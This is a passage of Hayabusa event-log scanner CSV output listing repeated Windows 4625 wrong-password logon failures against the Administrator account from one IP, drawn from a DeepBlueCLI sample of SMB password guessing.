01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.316 